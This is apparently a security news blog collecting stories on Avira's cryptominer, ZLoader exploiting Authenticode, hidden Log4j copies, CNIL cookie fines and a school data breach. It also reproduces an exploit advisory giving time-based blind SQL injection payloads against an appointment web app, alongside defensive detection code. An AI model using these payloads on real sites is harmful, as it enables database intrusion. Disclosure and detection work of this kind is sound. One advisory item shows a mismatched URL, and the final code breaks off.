Friday, January 17, 2025

500M Avira Antivirus Users Introduced to Cryptomining


Founded in 2006, Avira Operations GmbH & Co. KG is a German multinational software company best known for its Avira Free Security (a.k.a. Avira Free Antivirus). In January 2021, Avira was acquired by Tempe, Ariz.-based NortonLifeLock Inc., the same company that now owns Norton 360.

Many readers were surprised to learn recently that the popular Norton 360 antivirus suite now ships with a program that lets customers make money mining virtual currency. But Norton 360 isn’t alone in this dubious endeavour: Avira antivirus — which has built a base of 500 million users worldwide largely by making the product free — was recently bought by the same company that owns Norton 360 and is introducing its customers to a service called Avira Crypto.


In 2017, the identity theft protection company LifeLock was acquired by Symantec Corp., which was renamed to NortonLifeLock in 2019. LifeLock is now included in the Norton 360 service; Avira offers users a similar service called Breach Monitor.

Like Norton 360, Avira comes with a cryptominer already installed, but customers have to opt into using the service that powers it. Avira’s FAQ on its cryptomining service is somewhat sparse. For example, it doesn’t specify how much NortonLifeLock gets out of the deal (NortonLifeLock keeps 15% of any cryptocurrency mined by Norton Crypto).

“Avira Crypto allows you to use your computer’s idle time to mine the cryptocurrency Ethereum (ETH),” the FAQ explains. “Since cryptomining requires a high level of processing power, it is not suitable for users with an average computer. Even with compatible hardware, mining cryptocurrencies on your own can be less rewarding. Your best option is to join a mining pool that shares their computer power to improve their chance of mining cryptocurrency. The rewards are then distributed evenly to all members in the pool.”

NortonLifeLock hasn’t yet responded to requests for comment, so it’s unclear whether Avira uses the same cryptomining code as Norton Crypto. But there are clues that suggest that’s the case. NortonLifeLock announced Avira Crypto in late October 2021, but multiple other antivirus products have flagged Avira’s installer as malicious or unsafe for including a cryptominer as far back as Sept. 9, 2021.

Avira was detected as potentially unsafe for including a cryptominer back in Sept. 2021. Image: Virustotal.com.

The above screenshot was taken on Virustotal.com, a service owned by Google that scans submitted files against dozens of antivirus products. The detection report pictured was found by searching Virustotal for “ANvOptimusEnablementCuda,” a function included in the Norton Crypto mining component “Ncrypt.exe.”

Some longtime Norton customers took to NortonLifeLock’s online forum to express horror at the prospect of their antivirus product installing coin-mining software, regardless of whether the mining service was turned off by default.

“Norton should be DETECTING and killing off crypto mining hijacking, not installing their own,” reads a Dec. 28 thread on Norton’s forum titled “Absolutely furious.”

Others have charged that the crypto offering will end up costing customers more in electricity bills than they can ever hope to gain from letting their antivirus mine ETH. What’s more, there are hefty fees involved in moving any ETH mined by Norton or Avira Crypto to an account that the user can cash out, and many users apparently don’t understand they can’t cash out until they at least earn enough ETH to cover the fees.

In August 2021, NortonLifeLock said it had reached an agreement to acquire Avast, another longtime free antivirus product that also claims to have around 500 million users. It remains to be seen whether Avast Crypto will be the next brilliant offering from NortonLifeLock.




A 9-Year-old Microsoft Flaw is Still Being Exploited By Hackers in 2022


A ZLoader campaign that began in November has infected almost 2,200 victims in 111 countries by abusing a Windows flaw that Microsoft fixed back in 2013.

Hackers have long used a variety of tactics to sneak Zloader past malware detection tools. In this case, according to researchers at security firm Check Point, the attackers took advantage of a gap in Microsoft’s signature verification, the integrity check for ensuring that a file is legitimate and trustworthy.

First, they’d trick victims into installing a legitimate remote IT management tool called Atera to gain access and device control; that part’s not particularly surprising or novel.

From there, though, the hackers still needed to install ZLoader without Windows Defender or another malware scanner detecting or blocking it. 

The Nearly Decade-Old Flaw Being Exploited by Hackers

This is where the nearly decade-old flaw came in handy. Attackers could modify a legitimate “Dynamic-link library” file—a common file shared between multiple pieces of software to load code—to plant their malware.

The target DLL file is digitally signed by Microsoft, which proves its authenticity. But attackers were able to inconspicuously append a malicious script to the file without impacting Microsoft’s stamp of approval.

“When you see a file like a DLL that’s signed you’re pretty sure that you can trust it, but this shows that’s not always the case,” says Kobi Eisenkraft, a malware researcher at Check Point. “I think we will see more of this method of attack.”

Microsoft calls its code-signing process “Authenticode.” It released a fix in 2013 that made Authenticode’s signature verification stricter, to flag files that had been subtly manipulated in this way. Originally the patch was going to be pushed to all Windows users, but in July 2014 Microsoft revised its plan, making the update optional.

“As we worked with customers to adapt to this change, we determined that the impact to an existing software could be high,” the company wrote in 2014, meaning that the fix was causing false positives where legitimate files were flagged as potentially malicious. “Therefore, Microsoft no longer plans to enforce the stricter verification behaviour as a default requirement. The underlying functionality for stricter verification remains in place, however, and can be enabled at customer discretion.”
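Authenticode hashes the PE image but leaves the certificate table itself out of that hash, so bytes placed after the PKCS#7 blob inside the table do not disturb the signature; the stricter 2013 verification rejects such trailing content. The following added example (not Check Point's or Microsoft's code, and a simplification of Microsoft's check) measures that slack; build_toy_pe() produces a constructed, unsigned PE32+ skeleton with a dummy DER blob standing in for the signature.

```python
"""Measure bytes past the PKCS#7 blob in a PE file's Authenticode
certificate table: the slack the article's DLL manipulation lives in and
that the 2013 stricter verification rejects.  Added example; build_toy_pe()
produces a constructed PE32+ skeleton with a dummy DER blob, not a real
signed binary."""
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4
WIN_CERT_HEADER = 8          # dwLength (4) + wRevision (2) + wCertificateType (2)


def der_total_length(blob: bytes) -> int:
    """Encoded size of the outermost DER SEQUENCE (the PKCS#7 SignedData)."""
    if len(blob) < 2 or blob[0] != 0x30:
        raise ValueError("certificate table does not start with a DER SEQUENCE")
    first = blob[1]
    if first < 0x80:                          # short-form length
        return 2 + first
    n = first & 0x7F                          # long form: n length octets follow
    if n == 0 or len(blob) < 2 + n:
        raise ValueError("malformed DER length")
    return 2 + n + int.from_bytes(blob[2:2 + n], "big")


def cert_table_slack(pe: bytes) -> dict:
    """Locate the security directory and report data after the PKCS#7 blob."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE file")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    opt = e_lfanew + 4 + 20                   # optional header follows the COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    dd_off = 96 if magic == 0x10B else 112    # data directories: PE32 vs PE32+
    cert_off, cert_size = struct.unpack_from(
        "<II", pe, opt + dd_off + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)
    if cert_size == 0:
        return {"signed": False}
    # The security directory holds a raw file offset, not an RVA.
    dw_length, revision, cert_type = struct.unpack_from("<IHH", pe, cert_off)
    blob = pe[cert_off + WIN_CERT_HEADER:cert_off + dw_length]
    pkcs7_len = der_total_length(blob)
    trailing = blob[pkcs7_len:]
    # Up to 7 zero bytes of 8-byte alignment padding are legitimate; anything
    # else is content the signature does not cover.
    only_padding = len(trailing) < 8 and not any(trailing)
    return {"signed": True, "revision": revision, "type": cert_type,
            "pkcs7_len": pkcs7_len, "trailing_bytes": len(trailing),
            "suspicious": not only_padding}


def build_toy_pe(extra: bytes = b"") -> bytes:
    """Constructed PE32+ whose certificate table holds a dummy 260-byte DER
    SEQUENCE (standing in for PKCS#7) followed by `extra`, with dwLength
    covering both, as in the manipulation the article describes."""
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                 # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, 240, 0x22)
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                 # PE32+ magic
    struct.pack_into("<I", opt, 108, 16)                  # NumberOfRvaAndSizes
    headers_len = len(dos) + 4 + len(coff) + len(opt)
    fake_pkcs7 = b"\x30\x82\x01\x00" + bytes(256)         # SEQUENCE, 256-byte body
    body = fake_pkcs7 + extra
    dw_length = WIN_CERT_HEADER + len(body)
    padded = dw_length + (-dw_length % 8)                 # table is 8-byte aligned
    struct.pack_into("<II", opt, 112 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY,
                     headers_len, padded)
    win_cert = struct.pack("<IHH", dw_length, 0x0200, 0x0002) + body
    win_cert += bytes(padded - dw_length)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + win_cert


if __name__ == "__main__":
    print("clean   :", cert_table_slack(build_toy_pe()))
    print("appended:", cert_table_slack(build_toy_pe(b"APPENDED-DATA")))
```

Run against a real signed binary, a non-zero trailing_bytes count is exactly what the optional 2013 behaviour would make WinVerifyTrust reject.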


In a statement on Wednesday, Microsoft emphasized that users can protect themselves with the fix the company released in 2013. And the company noted that, as the Check Point researchers observed in the ZLoader campaign, the vulnerability can only be exploited if a device has already been compromised or attackers directly trick victims into running one of the manipulated files that appears to be signed. “Customers who apply the update and enable the configuration indicated in the security advisory will be protected,” a Microsoft spokesperson told WIRED.

But while the fix is out there, and has been for all this time, many Windows devices likely don’t have it enabled, since users and system administrators would need to know about the patch and then choose to set it up. Microsoft noted in 2013 that the vulnerability was being actively exploited by hackers in “targeted attacks.”

“We have a fix, but nobody uses it,” Eisenkraft says. “As a result, a lot of malware would be able to get into companies and personal computers using this method.”

The recent ZLoader attacks primarily targeted victims in the United States, Canada, and India. Other recent ZLoader attacks from an array of actors have used malicious word processing documents, tainted websites, and malicious ads to distribute the malware.

The Check Point researchers believe that this latest campaign was perpetrated by the prolific criminal hackers known as MalSmoke, because the group has a history of using similar techniques and the researchers saw some infrastructure links between this campaign and past MalSmoke hacking. MalSmoke has often had a particular focus on malvertising, particularly hijacking ads on sites and services that distribute porn and other adult content. The group has used ZLoader in past campaigns as well as other malware including the popular malicious downloader called “Smoke Loader.”

It’s not unheard of for vulnerabilities to persist in software for many years, but when those flaws are discovered their longevity typically means that they’re lurking in a large number of devices. It’s also not unusual for some gadgets, particularly internet of things devices, to go unpatched even when a fix for a particular vulnerability is available. But this campaign represents a difficult scenario to defend against: a vulnerability with a fix so obscure that few would even know to apply it.



Warning: Log4j Still Lurks Where Dependency Analysis Can’t Find It


Research shows Log4J still lurks where dependency analysis can’t find it

The standard way to include a third-party library in source code is to import it as an external dependency. That is the easiest approach, and it is also what most dependency analysis tools rely on to determine whether a vulnerable library is in play.

Any time code is included without calling it as an external package, traditional dependency analysis might not be enough to find it — including when Java coders use a common trick to resolve conflicting dependencies during the design process.


Log4J Warning

A new study by JFrog found that 400 packages on the Maven Central repository used Log4j code without declaring it as an external package. Around a third of those came from fat jars, jar files that bundle all of their external dependencies into a single artifact. The remainder came from Log4j code inserted directly into the source tree, including by shading, a work-around used when two or more dependencies call different versions of the same library in a way that might conflict.

While 400 may not seem like a lot for Maven Central, where Google found 17,000 packages using the vulnerable Log4j library, some of the 400 packages unearthed by JFrog are widely used.
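The three situations the study describes (a declared dependency, a shaded copy, and a fat jar) can be told apart by looking at class paths inside the archive rather than at Maven metadata. The following is an added example in the spirit of the scanner the article mentions, not JFrog's code; the jars built by sample_jars() are constructed fixtures and CLASS_STUB is placeholder bytes, not a real class.

```python
"""Find Log4j 2 code inside a jar when it is shaded into another package or
bundled in a nested jar, where manifest/POM-based dependency analysis sees
nothing.  Added example in the spirit of the scanner the article mentions;
not JFrog's code.  The jars built by sample_jars() are constructed fixtures."""
import io
import zipfile

# Tail of the class that performs JNDI lookups; relocation by a shading
# plugin changes the package prefix but keeps this tail.
MARKER = "/lookup/JndiLookup.class"
LOG4J_PKG = "org/apache/logging/log4j/"
# What a dependency scanner keys on: the Maven metadata for log4j-core.
POM_HINT = "META-INF/maven/org.apache.logging.log4j/"
NESTED = (".jar", ".war", ".ear")


def scan_jar_bytes(data: bytes, prefix: str = "") -> dict:
    """Return {'declared': bool, 'findings': [{'path', 'kind'}, ...]}.

    'declared' is True only for metadata in the outermost archive, which is
    all an import/POM-based tool would see.  Nested archives are joined to
    their parent path with '!' like the JVM's jar: URL syntax."""
    result = {"declared": False, "findings": []}
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.startswith(POM_HINT):
                if not prefix:
                    result["declared"] = True
            elif name.lower().endswith(NESTED):
                # Fat jar: recurse into the embedded dependency.
                inner = scan_jar_bytes(zf.read(name), prefix + name + "!")
                result["findings"].extend(inner["findings"])
            elif name.endswith(MARKER):
                if not name.startswith(LOG4J_PKG):
                    kind = "shaded"      # relocated package, e.g. com/example/shaded/org/...
                elif prefix:
                    kind = "bundled"     # original package inside a nested jar
                else:
                    kind = "direct"      # original package at the top level
                result["findings"].append({"path": prefix + name, "kind": kind})
    return result


def make_jar(entries: dict) -> bytes:
    """Build an in-memory jar from {path: bytes} (constructed fixture helper)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for path, content in entries.items():
            zf.writestr(path, content)
    return buf.getvalue()


# Placeholder class bytes: the class-file magic number and nothing else.
CLASS_STUB = b"\xca\xfe\xba\xbe" + bytes(28)


def sample_jars() -> dict:
    """Constructed jars mirroring the three situations the article describes."""
    declared_dependency = make_jar({
        POM_HINT + "log4j-core/pom.properties": b"artifactId=log4j-core\n",
        LOG4J_PKG + "core/lookup/JndiLookup.class": CLASS_STUB,
    })
    shaded_copy = make_jar({
        "com/example/app/Main.class": CLASS_STUB,
        "com/example/shaded/org/apache/logging/log4j/core/lookup/JndiLookup.class": CLASS_STUB,
    })
    fat_jar = make_jar({
        "com/example/app/Main.class": CLASS_STUB,
        "BOOT-INF/lib/log4j-core.jar": make_jar({
            LOG4J_PKG + "core/lookup/JndiLookup.class": CLASS_STUB,
        }),
    })
    return {"declared": declared_dependency, "shaded": shaded_copy, "fat": fat_jar}


if __name__ == "__main__":
    for label, jar in sample_jars().items():
        print(label, scan_jar_bytes(jar))
```

Only the first fixture reports declared=True, yet all three contain the lookup class; the other two are the cases an import-based scanner misses.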


“Some of the packages, we were familiar with. Some are commercially backed, some are maintained by the community. Some were pretty significant,” said Asaf Karas, chief technology officer of JFrog Security Research.

JFrog scanned Maven Central using an in-depth open-source scanner it released on December 28, which Karas suggests enterprises apply to their own Java applications. Maven Central’s packages may be indicative of how corporations coded their own internal and product software.

Although the 400 packages contain unlisted Log4j code, around 70% of them also declare dependencies that use Log4j, which might light up a scanner (albeit pointing it in a different direction).

JFrog has not yet released the names of the potentially vulnerable packages it discovered on Maven Central while it completes disclosure.

“It’s a process where we’re trying to really understand which are the ones that are the most popular and then disclose that information there first,” said Karas.

“But we didn’t want to postpone the fact that people should be aware that this kind of threat exists.”



France Fines Google and Facebook €210m Over Misuse of Data


France’s Data privacy watchdog says websites make it difficult for users to refuse cookies

France’s data privacy watchdog has fined Google and Facebook a combined €210m (£176m) for hampering users’ ability to stop the companies tracking their online activity.

The Commission Nationale de l’Informatique et des Libertés (CNIL) said on Thursday it had fined Google a record €150m for making it difficult for internet users to refuse cookies – small text files that build up a profile of a person’s web activity for commercial purposes. It fined Facebook €60m for the same reason.

Internet users’ prior consent for the use of cookies is a key pillar of the EU’s data privacy regulation, and a top priority for the CNIL.

“When you accept cookies, it’s done in just one click,” said Karin Kiefer, CNIL’s head of data protection and sanctions. “Rejecting cookies should be as easy as accepting them.”


The watchdog said the facebook.com, google.fr and youtube.com websites did not allow the easy refusal of cookies. Citing the example of Facebook, it said: “Several clicks are required to refuse all cookies, as opposed to a single one to accept them.”

It said the companies had three months to comply with its orders, including making it easier for French users to decline cookies, or face extra penalty payments of €100,000 for every day of delay.

A Google spokesperson said: “People trust us to respect their right to privacy and keep them safe. We understand our responsibility to protect that trust and are committing to further changes and active work with the CNIL in light of this decision.”

A spokesperson for Facebook’s parent company, Meta, said: “​​We are reviewing the authority’s decision and remain committed to working with relevant authorities. Our cookie consent controls provide people with greater control over their data, including a new settings menu on Facebook and Instagram where people can revisit and manage their decisions at any time, and we continue to develop and improve these controls.”

In 2020, the CNIL strengthened consent rights over ad trackers, saying websites operating in France should keep a register of internet users’ refusal to accept cookies for at least six months.

It also said internet users should be able to easily reconsider any initial agreement concerning cookies via a weblink or an icon that should be visible on all pages of a website.



COVID Test Data Breach at UK School


A mix-up at a school in Worcestershire, England, caused parents to receive the COVID-19 test results of other people’s children.

The data breach, reported today by the Evesham Journal, occurred at co-educational secondary school and sixth-form college The De Montfort School (TDMS) in Evesham, which is part of the Four Stones Multi Academy Trust.

After the holiday season, students returning to learning underwent asymptomatic testing for the coronavirus at TDMS on Tuesday. In a security incident ascribed to “human error,” some students’ test results were sent to the wrong guardians.

Ninth-grade student Amelia Felton was among the children affected by the data breach. Felton’s mother, Becky, learned of the security breach not through the school but via the parent of another student.

“I’m not very happy,” Becky Felton told the Evesham Journal. “It was another parent that told me she had received my daughter’s result. This is a serious breach of personal data.”

The headteacher at The De Montfort School, Ruth Allen, confirmed that the data breach had taken place while the test results were being uploaded to the school’s network. 

Allen said the incident had involved the personal data of only a small number of students. The school’s coronavirus testing process had been successful due to the cooperation of students and teaching staff.

“In line with government guidance, on Tuesday, January 4, the school facilitated asymptomatic testing for our students following the Christmas break,” said Allen.

“Testing for students was completed quickly and without fuss thanks to our excellent team of testers and the good will of our students, who now have testing down to a fine art. This meant that all students were back in face-to-face lessons on Wednesday.”

She added: “Unfortunately, whilst uploading results, a data breach occurred that affected a small number of students.”

Allen said that the data breach has been investigated according to the regulations laid out in the Four Stones Multi Academy Trust data protection policy and that the security incident was reported to the Information Commissioner’s Office. 

The TDMS head added that the data breach was “found to be the result of a human error.”



Online Veterinary Appointment System 1.0 – ‘Multiple’ SQL Injection

# Exploit Title: Online Veterinary Appointment System 1.0 - 'Multiple' SQL Injection

# Exploit Author: twseptian
# Vendor Homepage: https://www.sourcecodester.com/php/15119/online-veterinary-appointment-system-using-phpoop-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/ovas.zip
# Version: v1.0
# Tested on: Kali Linux 2021.4

=====================================================================================================================================
SQL Injection:
=====================================================================================================================================
SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Online Veterinary Appointment System 1.0 is vulnerable to 'Multiple' SQL injections.

=====================================================================================================================================
Attack Vector:
=====================================================================================================================================
An attacker can compromise the application's database using automated (or manual) tools such as SQLmap.

=====================================================================================================================================
1. Appointment Requests - Vulnerable Parameter(s): id
=====================================================================================================================================
Steps to reproduce:
Step-1: On the dashboard navigate to 'Appointment Requests' page using the following URL:

http://localhost/ovas/admin/?page=appointments

then go to 'Action' > 'View'.

Step-2: Put the SQL Injection payloads in 'id' field.
time-based blind payload : page=appointments/view_details&id=1' AND (SELECT 2197 FROM (SELECT(SLEEP(5)))DZwi) AND 'mQQq'='mQQq

Step-3: Now the target server accepted our payload and the response was delayed by 5 seconds.

=====================================================================================================================================
2. Inquiries - Vulnerable Parameter(s): id
=====================================================================================================================================
Steps to reproduce:
Step-1: On the dashboard navigate to 'Inquiries' page using the following URL:

http://localhost/ovas/admin/?page=inquiries

then go to 'Action' > 'View'.

Step-2: Let's intercept 'View' request using burpsuite: 

GET /ovas/admin/inquiries/view_details.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/ovas/admin/?page=inquiries
Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Put the SQL Injection payloads in 'id' field.
time-based blind payload : /ovas/admin/inquiries/view_details.php?id=1' AND (SELECT 6051 FROM (SELECT(SLEEP(5)))DEds) AND 'SOxP'='SOxP

Step-3: Now the target server accepted our payload and the response was delayed by 5 seconds.

=====================================================================================================================================
3. My Account - Vulnerable Parameter(s): id,firstname,lastname,username
=====================================================================================================================================
Steps to reproduce:
Step-1: On the dashboard navigate to 'My Account' page using the following URL:

http://localhost/ovas/admin/?page=user

Step-2: then let's intercept 'Update' request using burpsuite: 

POST /ovas/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------24959341351495697487735843118
Content-Length: 796
Origin: http://localhost
Connection: close
Referer: http://localhost/ovas/admin/?page=user
Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="id"

4
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="firstname"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="lastname"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="username"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="password"


-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


-----------------------------24959341351495697487735843118--

Put the SQL Injection payloads in Vulnerable Parameter(s): id,firstname,lastname,username
for example, the time-based blind payload in 'id':  

[SNIP]
Content-Disposition: form-data; name="id"

4 AND (SELECT 9713 FROM (SELECT(SLEEP(5)))YIam)
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="firstname"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="lastname"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="username"

user
-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="password"


-----------------------------24959341351495697487735843118
Content-Disposition: form-data; name="img"; filename=""
Content-Type: application/octet-stream


-----------------------------24959341351495697487735843118--

Step-3: If we use Burp Suite, click 'Send'. The target server accepted our payload, and the response was delayed by 5 seconds. The same applies to the other parameters.

=====================================================================================================================================
4. Category List - Vulnerable Parameter(s): id
=====================================================================================================================================
Steps to reproduce:
Step-1: On the dashboard navigate to 'Category List ' page using the following URL:

http://localhost/ovas/admin/?page=categories

then go to 'Action' > 'Edit' 

Step-2: Let's intercept 'Edit' request using burpsuite: 

GET /ovas/admin/categories/manage_category.php?id=2 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/ovas/admin/?page=categories
Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Put the SQL Injection payloads in 'id' field.
time-based blind payload : /ovas/admin/categories/manage_category.php?id=2' AND (SELECT 3851 FROM (SELECT(SLEEP(5)))UFXk) AND 'XbFb'='XbFb

Step-3: Now the target server accepted our payload and the response was delayed by 5 seconds.

=====================================================================================================================================
5. Service List - Vulnerable Parameter(s): id
=====================================================================================================================================
Steps to reproduce:
Step-1: On the dashboard navigate to 'Service List ' page using the following URL:

http://localhost/ovas/admin/?page=services

then go to 'Action' > 'View' 

Step-2: Let's intercept 'View' request using burpsuite: 

GET /ovas/admin/services/view_service.php?id=4 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://localhost/ovas/admin/?page=services
Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

Put the SQL Injection payloads in 'id' field.
time-based blind payload : /ovas/admin/services/view_service.php?id=4' AND (SELECT 5507 FROM (SELECT(SLEEP(5)))kAsY) AND 'UrUQ'='UrUQ

Step-3: Now the target server accepted our payload and the response was delayed by 5 seconds.

=====================================================================================================================================
6. Admin User List - Vulnerable Parameter(s): id
=====================================================================================================================================
Steps to reproduce:
Step-1: On the dashboard navigate to 'Admin User List ' page using the following URL:

http://localhost/ovas/admin/?page=user/list

then go to 'Action' > 'Edit' 

Step-2: Let's intercept 'Edit' request using burpsuite: 

GET /ovas/admin/?page=user/manage_user&id=3 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/ovas/admin/?page=user/list
Cookie: columns%2Fsuperschool%2Fcourses_view.php={%22courses-name%22:true}; columns%2Fsuperschool%2Fstudents_view.php={%22students-regno%22:true%2C%22students-name%22:true%2C%22students-course%22:true%2C%22students-year%22:true%2C%22students-academicyear%22:true}; columns%2Fsuperschool%2Fattendance_view.php={%22attendance-student%22:true%2C%22attendance-regno%22:true%2C%22attendance-week%22:true%2C%22attendance-date%22:true%2C%22attendance-unit%22:true%2C%22attendance-attended%22:true%2C%22attendance-semester%22:true%2C%22attendance-academicyear%22:true}; columns%2Fsuperschool%2Funits_view.php={%22units-name%22:true}; Student_Management_System=od4k9dre71c7assr0bldij1r1l; PHPSESSID=ml909jot3g3pr65oh31l8ip6j9
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

Put the SQL Injection payloads in 'id' field.
time-based blind payload : /ovas/admin/services/view_service.php?id=4' AND (SELECT 5507 FROM (SELECT(SLEEP(5)))kAsY) AND 'UrUQ'='UrUQ

Step-3: Now the target server accepted our payload and the response was delayed by 5 seconds.
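Defender-side counterpart to the advisory above: every probe it describes leaves a percent-encoded SLEEP() in the query string and, when it works, a roughly five-second response, both of which a log review can pick up. This is an added example, not the advisory author's code; it assumes an Apache-style access log with the request time in microseconds (%D) appended as the last field, and every line in SAMPLE_LOG is constructed.

```python
"""Flag time-based blind SQL injection probes in web server access logs.
Added example (not the advisory author's code).  Assumes an Apache-style
combined log with the request time in microseconds (%D) as the last
field; every log line in SAMPLE_LOG is constructed."""
import re
from urllib.parse import parse_qsl, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) \S+ (?P<micros>\d+)$'
)
# Delay primitives used by time-based blind payloads (MySQL, PostgreSQL, MSSQL).
TIME_FUNCS = re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b", re.I)
# A numeric id followed by a quote and a boolean operator: string-context breakout.
QUOTE_BREAK = re.compile(r"^\d+'\s*(and|or)\b", re.I)
# The advisory's payloads ask for SLEEP(5); tolerate some jitter.
DELAY_THRESHOLD_S = 4.0


def inspect_line(line: str):
    """Return a finding for a suspicious request, or None for a clean line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    # parse_qsl percent-decodes, so SLEEP%285%29 is matched as SLEEP(5).
    for key, value in parse_qsl(url.query, keep_blank_values=True):
        reasons = []
        if TIME_FUNCS.search(value):
            reasons.append("time-delay function")
        if QUOTE_BREAK.match(value):
            reasons.append("quote breakout")
        if reasons:
            seconds = int(m["micros"]) / 1_000_000
            return {
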